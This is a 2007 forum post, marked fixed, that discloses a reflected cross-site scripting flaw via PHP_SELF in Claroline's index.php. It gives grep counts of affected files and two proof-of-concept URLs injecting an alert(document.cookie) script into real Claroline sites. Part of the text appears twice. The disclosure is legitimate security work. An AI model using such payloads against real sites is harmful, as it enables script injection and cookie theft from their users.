index.php XSS [FIXED]
Posted: Sun Mar 11, 2007 8:10 am$_SERVER['PHP_SELF'] / $PHP_SELF Injection
You can get more info:
http://blog.phpdoc.info/archives/13-XSS-Woes.html
http://php.net/reserved.variables
http://forum.hardened-php.net/viewtopic.php?id=20
There are several other files vulnerable to this issue.
[fms@core claroline183]$ grep PHP_SELF *.php | wc -l
2
[fms@core claroline183]$ grep PHP_SELF */*.php | wc -l
0
[fms@core claroline183]$ grep PHP_SELF */*/*.php | wc -l
462
[fms@core claroline183]$ grep PHP_SELF */*/*/*.php | wc -l
134
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*.php | wc -l
5
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*.php | wc -l
15
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*/*.php | wc -l
0
- Code: Select all
http://campus.claroline.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.claroline.net/demo/claroline170/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
You can get more info:
http://blog.phpdoc.info/archives/13-XSS-Woes.html
http://php.net/reserved.variables
http://forum.hardened-php.net/viewtopic.php?id=20
There are several other files vulnerable to this issue.
[fms@core claroline183]$ grep PHP_SELF *.php | wc -l
2
[fms@core claroline183]$ grep PHP_SELF */*.php | wc -l
0
[fms@core claroline183]$ grep PHP_SELF */*/*.php | wc -l
462
[fms@core claroline183]$ grep PHP_SELF */*/*/*.php | wc -l
134
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*.php | wc -l
5
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*.php | wc -l
15
[fms@core claroline183]$ grep PHP_SELF */*/*/*/*/*/*.php | wc -l
0